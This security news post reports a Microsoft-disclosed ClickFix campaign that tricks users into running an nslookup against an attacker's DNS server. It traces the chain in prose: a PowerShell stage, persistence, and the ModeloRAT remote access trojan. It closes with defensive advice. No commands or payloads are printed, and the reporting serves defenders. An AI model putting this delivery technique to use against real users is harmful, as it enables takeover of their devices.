Published: February 16, 20263 min read

Microsoft Warns: ClickFix Attackers Are Now Hiding Malware Inside DNS Traffic

Attackers are now delivering malware through DNS queries. All it takes is one command typed by the victim.

By Secure.com
Microsoft Warns: ClickFix Attackers Are Now Hiding Malware Inside DNS Traffic

Dateline: February 16, 2026

Hackers Are Using Your DNS Against You—And You Won't See It Coming

ClickFix has been around for two years. The concept is almost embarrassingly simple — trick someone into typing a command into their own computer, and let them do the attacker's dirty work. Security teams got familiar with it. Defenders started watching for it.

So the attackers changed it.

Microsoft Threat Intelligence disclosed a new variant this week that routes malicious payloads through DNS — a first for ClickFix, and a real headache for anyone trying to detect it.

What Happened?

In the newly observed campaign, victims are told to run an nslookup command that queries an attacker-controlled DNS server — not their system's default. The server responds with a DNS query containing a malicious PowerShell script. That script runs directly on the device.

The attack kicks off through the Windows Run dialog. Once executed, the nslookup command contacts the threat actor's server, which sends back a second-stage PowerShell payload. That payload pulls down a ZIP archive carrying a Python runtime and a set of malicious scripts that quietly map out the infected device and its domain.

From there, the malware digs in. It creates a VBScript file and a startup shortcut so it relaunches every time the machine boots. The final payload is ModeloRAT — a remote access trojan that hands attackers full control of the compromised system.

What makes this different from every prior ClickFix campaign is the channel. Previous attacks delivered payloads over HTTP. This one uses DNS — letting attackers swap out payloads on the fly while their traffic blends in with normal network activity.

What's the Impact?

Two problems for defenders: detection gets harder, and the attack surface gets wider.

By stashing payloads inside DNS records, attackers skip putting malicious files on web servers where URL filters or firewalls might catch them. Some variants also force queries through public DNS resolvers — bypassing corporate DNS filters entirely.

That's not even the biggest issue. The attack works because it exploits how people think about troubleshooting steps. The instructions look like something an IT team might actually send. Victims run the command because it looks routine — not because they were fooled by a poorly designed phishing page.

And if an attacker controls the victim's DNS resolver, the damage goes further. They can redirect banking sites to phishing pages that look pixel-perfect. They can push malicious software updates that appear to come from trusted vendors. Authentication tokens can be intercepted in transit. This isn't theoretical — it's what the infrastructure is designed to do.

Nation-state groups have taken notice. ClickFix campaigns aren't just a criminal tool anymore. They're being picked up for espionage and ransomware operations at scale.

How to Avoid This

No single fix covers everything here, but there are concrete steps that reduce real exposure.

On endpoints: restrict PowerShell execution policies, block the Windows Run dialog for standard users where possible, and set detection rules that flag clipboard-to-execution patterns. Application controls that only allow approved executables also help limit what a ClickFix payload can actually do once it runs.

On the network side: turn on DNS query logging and actually review it. Look for unusual TXT record queries. Deploy protective DNS services that can flag and block suspicious domain resolutions before they complete. Threat intelligence feeds tracking active ClickFix infrastructure can give teams a head start.

Security awareness training needs updating too. Users should know — clearly, not buried in a policy doc — that no real website or IT team will ever ask them to paste something into a Run dialog and hit Enter. Running simulated ClickFix-style phishing exercises is one of the faster ways to build that instinct.

The attack doesn't need an exploit. It needs a person who doesn't think twice. That's the part worth fixing first.

Similar Blogs

What is Security Posture Assessment?
Published: February 19, 2026

What is Security Posture Assessment?

Security posture assessment evaluates your organization's overall cybersecurity strength, identifying vulnerabilities and providing a roadmap to enhance your defense against evolving threats.

Read More →
The Watchers: Persona Code Leak Uncovers Hidden Surveillance Pipeline
Published: February 19, 2026

The Watchers: Persona Code Leak Uncovers Hidden Surveillance Pipeline

A major source code leak exposes how routine age-verification selfies for popular apps are feeding a massive government surveillance and reporting machine.

Read More →
Grandstream VoIP Bug Leaves SMBs Open to Call Interception and Network Breaches
Published: February 19, 2026

Grandstream VoIP Bug Leaves SMBs Open to Call Interception and Network Breaches

A severe vulnerability in popular Grandstream desk phones gives attackers root access to listen to calls and pivot into corporate networks—highlighting a major blind spot for small businesses.

Read More →